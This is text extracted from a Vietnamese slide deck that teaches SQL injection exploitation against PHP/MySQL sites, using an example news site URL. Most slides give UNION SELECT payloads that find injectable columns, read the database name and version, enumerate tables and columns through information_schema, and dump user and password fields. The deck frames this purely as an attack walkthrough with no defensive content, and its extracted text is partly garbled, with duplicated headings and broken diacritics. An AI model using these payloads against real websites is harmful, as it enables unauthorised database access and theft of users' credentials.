NHỮNG BƯỚC CẦN LÀM ĐỂ KHAI THÁC SQL INJECTION XÁC ĐỊNH XEM WEB ĐÓ CÓ BỊ DÍNH LỖI SQL INJECTION HAY KHÔNG NẾU KHÔNG DÍNH THÌ NGHỈ CHƠI NẾU DÍNH THÌ TIẾP TỤC CHƠI TIẾP... CÁCH NH N BI
Trang 1 GI I THI U ỚI THIỆU ỆU
LỖI BẢO MẬT WEBSITE SQL
INJECTION
Trang 2NHỮNG BƯỚC CẦN LÀM ĐỂ KHAI THÁC SQL INJECTION
XÁC ĐỊNH XEM WEB ĐÓ CÓ BỊ DÍNH LỖI SQL INJECTION HAY KHÔNG
NẾU KHÔNG DÍNH THÌ NGHỈ CHƠI
NẾU DÍNH THÌ TIẾP TỤC CHƠI TIẾP
Trang 3CÁC B ƯỚC THỰC HIỆN KHI WEBSITE BỊ LỖI C TH C HI N KHI WEBSITE B L I ỰC HIỆN KHI WEBSITE BỊ LỖI ỆN KHI WEBSITE BỊ LỖI Ị LỖI ỖI
L Y TÊN DATABASE ẤY TÊN DATABASE
XÁC ĐỊNH VERSION CỦA DATABASE
XÁC ĐỊNH CÁC TABLES CỦA DATABASE
XÁC ĐỊNH CÁC COLUMN CỦA TỪNG TABLE
LẤY THÔNG TIN
Trang 4CÁC B ƯỚC THỰC HIỆN KHI WEBSITE BỊ LỖI C TH C HI N KHI WEBSITE B L I ỰC HIỆN KHI WEBSITE BỊ LỖI ỆN KHI WEBSITE BỊ LỖI Ị LỖI ỖI
L Y TÊN DATABASE ẤY TÊN DATABASE
XÁC ĐỊNH VERSION CỦA DATABASE
XÁC ĐỊNH CÁC TABLES CỦA DATABASE
XÁC ĐỊNH CÁC COLUMN CỦA TỪNG TABLE
LẤY THÔNG TIN
Trang 5CÁCH NH N BI T WEBSITE B L I SQL ẬN BIẾT WEBSITE BỊ LỖI SQL ẾT WEBSITE BỊ LỖI SQL Ị LỖI ỖI
INJECTION
THÊM DẤU NHÁY ĐƠN VÀO SAU ID
http://webcuateo.com/tintuc.php?id=12’
THÔNG BÁO LỖI
Warning: mysql_fetch_assoc(): supplied argument is not a valid
MySQL result resource in /data/home/dbteo/htdocs/tintuc.php
on line 25
DEMO
Trang 6XÁC ĐỊNH CÁC CỘT GÂY RA
LỖI SQL INJECTION
Thêm dấu trừ trước id và câu lệnh sql phía sau
id
VÍ DỤ:
http://webcuateo.com/tintuc.php?id=-12
union select all
1,2,3,4 DEMO
Trang 7TH CHO Đ N KHI CÓ K T QU TR V LÀ CÁC Ử CHO ĐẾN KHI CÓ KẾT QUẢ TRẢ VỀ LÀ CÁC ẾT WEBSITE BỊ LỖI SQL ẾT WEBSITE BỊ LỖI SQL Ả TRẢ VỀ LÀ CÁC Ả TRẢ VỀ LÀ CÁC Ề LÀ CÁC
C T GÂY NÊN L I SQL ỘT GÂY NÊN LỖI SQL ỖI
KẾT QUẢ NHƯ SAU:
Trang 8XÁC ĐỊNH TÊN DATABASE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,database(),6,7,8,…y from
information_schema.tables where table_schema =
database() VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,database(),6,7,8,9,10,11 from
information_schema.tables where table_schema =
database() DEMO
Trang 9XÁC ĐỊNH VERSION CỦA
DATABASE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,version(),6,7,8,…y from information_schema.tables where table_schema =
database() VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,version(),6,7,8,9,10,11 from
information_schema.tables where table_schema =
database() DEMO
Trang 10XÁC ĐỊNH CÁC B NG C A Ả TRẢ VỀ LÀ CÁC ỦA
DATABSE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(table_name),6,7,8,…y from
information_schema.tables where table_schema =
database() VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat(table_name),6,7,8,9,10,11 from information_schema.tables where table_schema =
database() DEMO
Trang 11XÁC ĐỊNH CÁC C T C A CÁC ỘT GÂY NÊN LỖI SQL ỦA
TABLE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(column_name),6,7,8,…y from
information_schema.columns where table_schema =
database() VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from information_schema.columns where table_schema =
database() DEMO
Trang 12XÁC ĐỊNH THÔNG TIN C A C A ỦA ỦA
CÁC C T ỘT GÂY NÊN LỖI SQL
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(tên cột user,tên cột pass),6,7,8,
…y from tên bảng chứa cột user và pass
VÍ DỤ
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat( user,pass ),6,7,8,9,10,11 from users
DEMO
Trang 13XÁC ĐỊNH THÔNG TIN C A CÁC ỦA
C T – CÁCH KHÁC ỘT GÂY NÊN LỖI SQL
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(column_name),6,7,8,…y from
information_schema.columns where table_schema =
database() and table_name = 0x mã hex của tên bảng chứa user và pass
VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from
information_schema.columns where table_schema =
database() and table_name = 0x51746d696f
DEMO
Trang 14TỔNG KẾT